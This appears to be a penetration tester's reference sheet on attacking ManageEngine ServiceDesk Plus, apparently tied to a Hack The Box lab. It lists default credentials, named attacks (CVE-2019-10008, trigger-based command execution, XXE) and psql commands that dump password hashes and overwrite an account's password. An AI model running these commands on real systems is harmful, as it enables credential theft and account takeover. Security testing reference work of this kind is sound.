ManageEngine Service Desk Plus (SDP)
Credentials #
# default
administrator:administrator
# guest
guest:guest
Version #
- On login screen
Port #
- 8080/tcp
- 8081/tcp - NIO port?
Interesting URL Paths #
# Mobie form
http://examplesite.com:8080/mc
Recon #
- Check suspicious tickets both open and closed. You might find some confidential information such as credentials.
Attacks #
- Privilege escalation (CVE-2019-10008) - If you are having issue, try manually logging in first as guest and execute the exploit from cli.
- Craeate a custom triggers that will execute command when a ticket is created (you need a valid admin account).
- XXE. Looks like this also works for 9.3
- Example attack path from HTB Helpline
Database #
- Postgres DB runs on port
65432/tcp
- No way to recover current password, but you can do hard reset I think
- Here is a query to enumerate users
/psql.exe -h 127.0.0.1 -p 65432 -U postgres -d servicedesk -c "select * from aaauser"
./psql.exe -h 127.0.0.1 -p 65432 -U postgres -d servicedesk -c "select aaauser.first_name, aaapassword.password from aaauser, aaapassword where aaauser.user_id = aaapassword.password_id "
- Updates user password
# password: $2a$12$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG
# salt: $2a$12$6VGARvoc/dRcRxOckr6Wmu
# NOTE:
# - We use backticks here to escape `$`. If not, the command
# will fail.
./psql.exe -h 127.0.0.1 -p 65432 -U postgres -w -d servicedesk -c "update aaapassword set password='`$2a`$12`$6VGARvoc/dRcRxOckr6WmucFnKFfxdbEMcJvQdJaS5beNK0ci0laG', salt='`$2a`$12`$6VGARvoc/dRcRxOckr6Wmu' where password_id = 2;"